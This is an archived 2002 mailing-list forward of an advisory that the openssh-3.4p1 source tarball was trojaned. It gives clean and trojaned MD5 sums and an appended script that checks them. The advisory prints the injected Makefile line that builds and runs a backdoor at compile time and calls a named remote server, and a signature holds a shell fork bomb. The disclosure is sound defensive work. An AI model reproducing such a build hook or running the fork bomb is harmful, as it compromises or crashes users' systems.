Date: Sun, 04 Aug 2002 14:07:09 -0700
To: FreeBSD-Questions@FreeBSD.ORG, freebsd-current@freebsd.org
From: Karl Agee
Subject: Fwd: <3CLUG> !!!! [mikael.olsson@clavister.com: openssh-3.4p1.tar.gz distribution recently trojaned] !!!!

FYI....from my Linux User Group maillist.

--karl

>Date: Thu, 1 Aug 2002 13:20:48 -0700
>From: Ed
>To: 3clug@3clug.org
>Subject: <3CLUG> !!!! [mikael.olsson@clavister.com: openssh-3.4p1.tar.gz
>distribution recently trojaned] !!!!
>
>
>if you didn't know this already, some copies of the source distribution
>of openssh are *trojaned*! the _untrojaned_ version has this md5 sum:
>459c1d0262e939d6432f193c7a4ba8a8 (use md5sum openssh-3.4p1.tar.gz to
>check it). the trojan horse connects to a computer in australia and
>opens a shell on the local machine.
>
> Ed
>
>----- Forwarded message from Mikael Olsson -----
>
>Date: Thu, 01 Aug 2002 13:20:47 +0200
>From: Mikael Olsson
>Organization: Clavister AB
>To: bugtraq@securityfocus.com
>Subject: openssh-3.4p1.tar.gz distribution recently trojaned
>
>
>From
>http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
>
>----- Forwarded message from Edwin Groothuis -----
>
>Date: Thu, 1 Aug 2002 16:55:51 +1000
>From: Edwin Groothuis
>To: incidents@securityfocus.com
>Subject: openssh-3.4p1.tar.gz trojaned
>
>Greetings,
>
>Just want to inform you that the OpenSSH package on ftp.openbsd.org
>(and probably all its mirrors now) is trojaned:
>
> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>
>The OpenBSD people have been informed about it (via email to
>deraadt@openbsd.org and via irc.openprojects.org/#openbsd)
>
>
>The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
> all: libopenbsd-compat.a
>+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
>./bf-test.out &
>
>bf-test.c[1] is nothing more than a wrapper which generates a
>shell-script[2] which compiles itself and tries to connect to a
>server running on 203.62.158.32:6667 (web.snsonline.net).
>
>[1] http://www.mavetju.org/~edwin/bf-test.c
>[2] http://www.mavetju.org/~edwin/bf-output.sh
>
>This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
>ports system:
> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>
>This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
>
>Edwin
>
>--
>Edwin Groothuis | Personal website: http://www.MavEtJu.org
>edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php
>bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/
>
>----- End forwarded message -----
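The check the forwarded advisory describes, written out as an added example that is not part of the original messages: it classifies a tarball by the two MD5 digests quoted above and looks in an unpacked tree for a recipe line in openbsd-compat/Makefile.in that references bf-test. The function names and the script layout are assumptions made for illustration.

```shell
#!/bin/sh
# Added example. Digests and the injected Makefile line come from the
# advisory quoted above; function names are hypothetical.

GOOD_MD5=459c1d0262e939d6432f193c7a4ba8a8   # copy in the FreeBSD ports system
BAD_MD5=3ac9bc346d736b4a51d676faa2a08a57    # trojaned copy

# classify_md5 HEX -> prints clean | trojaned | unknown
classify_md5() {
    digest=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case "$digest" in
        "$GOOD_MD5") echo clean ;;
        "$BAD_MD5")  echo trojaned ;;
        *)           echo unknown ;;   # neither digest: do not build from it
    esac
}

# file_md5 PATH -> prints the hex digest (md5sum on Linux, md5 -q on BSD)
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d ' ' -f 1
    else
        md5 -q "$1"
    fi
}

# makefile_is_tampered PATH -> exit 0 if an indented recipe line mentions bf-test
makefile_is_tampered() {
    grep -Eq '^[[:space:]]+.*bf-test' "$1"
}

# check_tree DIR -> prints tampered | clean | missing for an unpacked source tree
check_tree() {
    mk="$1/openbsd-compat/Makefile.in"
    [ -f "$mk" ] || { echo missing; return 0; }
    if makefile_is_tampered "$mk"; then echo tampered; else echo clean; fi
}

# Usage: sh check-openssh.sh openssh-3.4p1.tar.gz [unpacked-dir]
if [ "$#" -ge 1 ]; then
    echo "tarball: $(classify_md5 "$(file_md5 "$1")")"
    if [ "$#" -ge 2 ]; then
        echo "tree: $(check_tree "$2")"
    fi
fi
```

Run it before `./configure` or `make`, since the injected line executes at build time.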